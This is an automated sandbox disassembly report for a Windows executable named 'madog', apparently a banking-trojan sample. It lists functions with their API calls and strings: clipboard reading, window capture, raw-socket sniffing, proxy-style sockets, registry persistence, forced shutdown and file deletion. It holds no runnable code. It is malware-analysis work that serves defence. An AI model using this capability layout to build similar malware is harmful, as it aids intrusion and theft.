Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 00405E1A
IntersectRect.USER32(?,?), ref: 00405E58
IsRectEmpty.USER32(?), ref: 00405E6A
IntersectRect.USER32(?,?), ref: 00405E81

Part of subcall function 00405C8A: GetWindowThreadProcessId.USER32(?,?), ref: 00405CB4
Part of subcall function 00405C8A: ResetEvent.KERNEL32(00000010), ref: 00405D03
Part of subcall function 00405C8A: PostMessageW.USER32(?,?,?,00000010), ref: 00405D26
Part of subcall function 00405C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00405D35
Part of subcall function 00405C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 00405D60
Part of subcall function 00405C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00405D70
Part of subcall function 00405C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00405D82
Part of subcall function 00405C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00405DA7
Part of subcall function 00405C8A: IntersectRect.USER32(?,?), ref: 00405DC7
Part of subcall function 00405C8A: FillRect.USER32(?,?,00000006), ref: 00405DD9
Part of subcall function 00405C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00405DED

GetTopWindow.USER32(?), ref: 00405EB1

Part of subcall function 00417AC1: GetWindow.USER32(?,00000001), ref: 00417AE3

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0040BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0040BBE7

Part of subcall function 00412507: CreateMutexW.KERNEL32(00422C30,00000000,?,?,?,?,?), ref: 00412528

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0040BC2A

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

WaitForSingleObject.KERNEL32(000000C8), ref: 0040BC62

Part of subcall function 0041763A: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00419EAB,?,?,00000004), ref: 00417658
Part of subcall function 0041763A: RegSetValueExW.ADVAPI32(00000004,00000004,00000000,?,?,00419EAB,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417672
Part of subcall function 0041763A: RegCloseKey.ADVAPI32(00000004,?,?,00419EAB,?,?,00000004,?,00000004), ref: 00417681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0040BC98

Part of subcall function 00416B8E: ReleaseMutex.KERNEL32(00000000,00413021,?,?,?), ref: 00416B92

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 0041B06B

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

GlobalLock.KERNEL32(00000000), ref: 0041B09F
EnterCriticalSection.KERNEL32(00423FB4,00000000,00000000), ref: 0041B0DF

Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD7C
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AD9D
Part of subcall function 0041AD5F: EnterCriticalSection.KERNEL32(00423FB4,?,?,?,?,0041B052,?), ref: 0041ADAE
Part of subcall function 0041AD5F: LeaveCriticalSection.KERNEL32(00423FB4,?,?,?,0041B052,?), ref: 0041AE47

LeaveCriticalSection.KERNEL32(00423FB4,00000000,00404A68), ref: 0041B0F6

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

GlobalUnlock.KERNEL32(?), ref: 0041B109

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004168E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 004168F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0041691C
WSAGetLastError.WS2_32 ref: 00416923

Part of subcall function 0041338B: HeapAlloc.KERNEL32(00000008,-00000004,00414B59,00000000,?,?,?,00411E08,00000000,004122ED,?,?,00000000), ref: 0041339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041694F

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

closesocket.WS2_32(?), ref: 00416963

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00418A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00418A5A

Part of subcall function 00418716: SetFileAttributesW.KERNEL32(00000080,00000080,0041B4CD,?), ref: 0041871F
Part of subcall function 00418716: DeleteFileW.KERNEL32(?), ref: 00418729

FindNextFileW.KERNEL32(00000000,?), ref: 00418AB5
FindClose.KERNEL32(00000000), ref: 00418AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00418ACC
RemoveDirectoryW.KERNEL32(?), ref: 00418AD3

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 00405A88

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

TlsGetValue.KERNEL32 ref: 00405A21
SaveDC.GDI32(?), ref: 00405A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 00405A61
RestoreDC.GDI32(?,00000000), ref: 00405A73

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,004130F6), ref: 00405C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,004130F6), ref: 00405C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,004130F6), ref: 00405C1C

Part of subcall function 004054A9: GetWindowInfo.USER32(?,?), ref: 00405515
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 00405538
Part of subcall function 004054A9: IntersectRect.USER32(?,?,-00000114), ref: 0040558E
Part of subcall function 004054A9: GetDC.USER32(00000000), ref: 004055D2
Part of subcall function 004054A9: CreateCompatibleDC.GDI32(00000000), ref: 004055E3
Part of subcall function 004054A9: ReleaseDC.USER32(00000000,00000000), ref: 004055ED
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 00405602
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 00405610
Part of subcall function 004054A9: TlsSetValue.KERNEL32(?), ref: 0040565B
Part of subcall function 004054A9: EqualRect.USER32(?,?), ref: 00405675
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405680
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040569B
Part of subcall function 004054A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 004056BB
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 004056CD
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 004056E4
Part of subcall function 004054A9: SaveDC.GDI32(00000000), ref: 00405706
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040571C
Part of subcall function 004054A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00405735
Part of subcall function 004054A9: RestoreDC.GDI32(00000000,?), ref: 00405743
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00405756
Part of subcall function 004054A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00405766
Part of subcall function 004054A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00405778
Part of subcall function 004054A9: TlsSetValue.KERNEL32(00000000), ref: 00405792
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 004057B2
Part of subcall function 004054A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 004057CE
Part of subcall function 004054A9: SelectObject.GDI32(00000000,?), ref: 004057E4
Part of subcall function 004054A9: DeleteDC.GDI32(00000000), ref: 004057EB
Part of subcall function 004054A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00405813
Part of subcall function 004054A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00405829

SetEvent.KERNEL32(00422868,?,00000001), ref: 00405C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405C76

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
ReleaseMutex.KERNEL32(?), ref: 0040B0E7
IsWindow.USER32(?), ref: 0040B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041040D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217

APIs

Part of subcall function 00416973: getsockname.WS2_32(?,?,?), ref: 00416991

Part of subcall function 0041636E: recv.WS2_32(?,?,00000001,00000000), ref: 00416392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 004104DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00410515

Part of subcall function 004164FD: socket.WS2_32(00000000,00000001,00000006), ref: 00416506
Part of subcall function 004164FD: bind.WS2_32(00000000,?,-0000001D), ref: 00416526
Part of subcall function 004164FD: listen.WS2_32(00000000,?), ref: 00416535
Part of subcall function 004164FD: closesocket.WS2_32(00000000), ref: 00416540

Part of subcall function 0041672E: accept.WS2_32(00000000,00000000,00000001), ref: 00416754

Part of subcall function 00416403: socket.WS2_32(?,00000001,00000006), ref: 0041640C
Part of subcall function 00416403: connect.WS2_32(00000000,?,-0000001D), ref: 0041642C
Part of subcall function 00416403: closesocket.WS2_32(00000000), ref: 00416437

Part of subcall function 004167B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004167CC

Part of subcall function 004165B7: recv.WS2_32(?,?,00000400,00000000), ref: 00416600
Part of subcall function 004165B7: send.WS2_32(?,?,00000000,00000000), ref: 0041661A
Part of subcall function 004165B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00416657

Part of subcall function 0041675E: shutdown.WS2_32(?,00000002), ref: 00416766
Part of subcall function 0041675E: closesocket.WS2_32(?), ref: 0041676D

Part of subcall function 00410397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 004103BB
Part of subcall function 00410397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 004103CA

Strings

<M@, xrefs: 00410655, 0041061C, 0041056B
[, xrefs: 0041054E

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041773A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103

APIs

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

CharUpperW.USER32(00000000), ref: 0041785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 00417759
.exe, xrefs: 00417745
aeiouy, xrefs: 00417768, 00417771, 004177A9, 004177B2

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004098B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040996B

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

&, xrefs: 0040994A
#, xrefs: 00409951

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00409009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 004090BB

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 00409093
&, xrefs: 004090A1

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00417A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Strings

p.B, xrefs: 00417A41
Local\, xrefs: 00417A9A
Global\, xrefs: 00417A91

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004165B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

recv.WS2_32(?,?,00000400,00000000), ref: 00416600
send.WS2_32(?,?,00000000,00000000), ref: 0041661A
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00416657

Strings

<M@, xrefs: 004165B7

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00412828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 004135C6: MultiByteToWideChar.KERNEL32(00412884,00000000,?,00411FF2,?,7718F8FF,00412884,00000000,00000032,?,7718F8FF,00000000), ref: 004135DD

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

Strings

SOFTWARE\Microsoft, xrefs: 00412855
C:\Users\admin\AppData\Roaming, xrefs: 00412870, 00412888
.dat, xrefs: 0041289B

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00405ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(004225D0), ref: 00405F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00405F23

Part of subcall function 004189C2: PathSkipRootW.SHLWAPI(?), ref: 004189CD
Part of subcall function 004189C2: GetFileAttributesW.KERNEL32(?,?,00000000,0041D261,?,?,?,?,?), ref: 004189F5
Part of subcall function 004189C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041D261,?,?,?,?,?), ref: 00418A03

Part of subcall function 00416A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00416A5B
Part of subcall function 00416A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00416A77
Part of subcall function 00416A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00416A8E
Part of subcall function 00416A3C: LocalFree.KERNEL32(00000000), ref: 00416A9D

GetFileAttributesW.KERNEL32(004223C8,004225D0,004225D0,00000000,00020000,004069C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00405F46

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

Strings

.tmp, xrefs: 00405F1D

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0040F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040F3CC

Part of subcall function 0041D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D34A
Part of subcall function 0041D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D35D
Part of subcall function 0041D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041D39B
Part of subcall function 0041D325: CharToOemW.USER32(?,?), ref: 0041D3B7
Part of subcall function 0041D325: CharToOemW.USER32(?,?), ref: 0041D3C6
Part of subcall function 0041D325: ExitProcess.KERNEL32(00000000), ref: 0041D41C

Part of subcall function 0040E959: CreateMutexW.KERNEL32(00422C30,00000000,00422A60,?,?,00404E69,?,?,?,743C152E,00000002), ref: 0040E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0040F3DF

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,0041C9A1,00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C9A1,?,?,?,?,0041C9A1,SeTcbPrivilege), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,0041C9A1,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.ADVAPI32(0041C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(0041C9A1), ref: 00414B02

Strings

, xrefs: 0040F383
SeShutdownPrivilege, xrefs: 0040F3AB

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004189C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 004189CD
GetFileAttributesW.KERNEL32(?,?,00000000,0041D261,?,?,?,?,?), ref: 004189F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041D261,?,?,?,?,?), ref: 00418A03

Strings

.exe, xrefs: 004189C9

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 004187C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004187D7

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00418829

Strings

%s%08x, xrefs: 004187F2
tmp, xrefs: 004187ED

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00414BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00411DBB,00000000,004122ED), ref: 00414BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00411DBB,00000000,004122ED), ref: 00414BDF

Strings

IsWow64Process, xrefs: 00414BD9
kernel32.dll, xrefs: 00414BCA

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 0041AAB6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24

APIs

InternetCloseHandle.WININET(?), ref: 0041AABD

Part of subcall function 0041262D: WaitForSingleObject.KERNEL32(00000000,0040BB83), ref: 00412635

EnterCriticalSection.KERNEL32(00423F24), ref: 0041AAD5
LeaveCriticalSection.KERNEL32(00423F24), ref: 0041AAEB

Part of subcall function 00419CD9: CloseHandle.KERNEL32(?), ref: 00419CEC

Strings

$?B, xrefs: 0041AACF

Memory Dump Source

Source File: 00000001.00000002.1644614388.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1644604305.00400000.00000002.sdmp
Associated: 00000001.00000002.1644631781.00422000.00000004.sdmp
Associated: 00000001.00000002.1644638987.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_madog.jbxd

Function 00410AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00410CB5

Part of subcall function 00413346: HeapAlloc.KERNEL32(00000008,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?,?), ref: 00413368
Part of subcall function 00413346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,004136F5,?,?,00000000,004141E1,?,?,?,?,?,00414191,?,?), ref: 00413379

Part of subcall function 00414660: CryptAcquireContextW.ADVAPI32(00418C87,00000000,00000000,00000001,F0000040,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414679
Part of subcall function 00414660: CryptCreateHash.ADVAPI32(00418C87,00008003,00000000,00000000,00000030,?,00418C87,?,00000030,?,?,?,004191A0,00423EC0), ref: 00414691
